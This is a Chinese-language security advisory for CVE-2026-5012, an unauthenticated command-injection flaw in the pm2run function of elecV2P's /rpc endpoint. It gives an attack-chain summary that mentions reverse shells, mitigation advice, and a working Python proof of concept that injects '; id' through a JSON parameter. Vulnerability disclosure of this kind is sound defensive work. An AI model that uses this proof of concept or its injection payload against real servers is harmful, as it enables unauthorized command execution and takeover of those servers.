CVE-2026-5012 CVSS 7.3 高危

CVE-2026-5012 elecV2P远程命令执行漏洞

披露日期: 2026-03-28

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5012

漏洞类型

远程命令执行

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

elecV2 elecV2P

漏洞概述

elecV2 elecV2P 3.8.3及以下版本在/rpc接口的pm2run函数中存在操作系统命令注入漏洞。由于未对用户输入进行严格过滤，攻击者无需认证即可远程发送恶意请求，导致在服务器上执行任意系统命令，进而可能控制服务器。

技术细节

该漏洞位于elecV2P的/rpc接口处理逻辑中，具体受影响的函数为pm2run。攻击者利用该函数在处理参数时的缺陷，通过构造特殊的Payload（如分号、管道符等拼接命令），将恶意操作系统指令注入到后端执行。CVSS向量显示攻击复杂度低（AC:L），无需特权（PR:N）且无需用户交互（UI:N）。攻击成功后，可导致机密性、完整性和可用性受到低程度的影响，实际利用中可能导致服务器被完全控制。

攻击链分析

STEP 1

1. 发现目标

攻击者通过网络扫描发现暴露在互联网上的elecV2P服务。

STEP 2

2. 构造Payload

攻击者分析漏洞机制，构造包含恶意操作系统命令（如反弹Shell）的JSON数据。

STEP 3

3. 发送请求

攻击者向目标服务器的/rpc接口发送POST请求，触发pm2run函数。

STEP 4

4. 执行命令

服务器端未过滤特殊字符，执行了注入的操作系统命令，攻击者获取权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit(target_url):
    # The vulnerable endpoint is /rpc and function is pm2run
    url = f"{target_url}/rpc"
    
    # Payload example: executing 'id' command
    # Adjust the payload structure based on the actual JSON structure expected by the API
    payload = {
        "fn": "pm2run",
        "params": ["; id"] 
    }
    
    headers = {
        "Content-Type": "application/json"
    }
    
    try:
        response = requests.post(url, json=payload, headers=headers, timeout=10)
        if response.status_code == 200:
            print("[+] Request sent successfully")
            print("[+] Response:")
            print(response.text)
        else:
            print(f"[-] Failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    target = "http://127.0.0.1:80" # Replace with actual target
    exploit(target)

影响范围

elecV2 elecV2P <= 3.8.3

防御指南

临时缓解措施

目前官方尚未发布修复补丁。临时缓解措施包括：禁用pm2run功能或完全阻断外部对/rpc路径的访问；检查服务器日志是否存在异常的命令执行记录；部署Web应用防火墙（WAF）规则以拦截包含命令注入特征的流量。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5012
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5012
3 Details https://www.cvedetails.com/cve/CVE-2026-5012/
4 VulDB https://vuldb.com/cve/CVE-2026-5012
5 Link https://github.com/elecV2/elecV2P/
6 Link https://github.com/elecV2/elecV2P/issues/196
7 Link https://vuldb.com/submit/779174
8 Link https://vuldb.com/vuln/353897
9 Link https://vuldb.com/vuln/353897/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表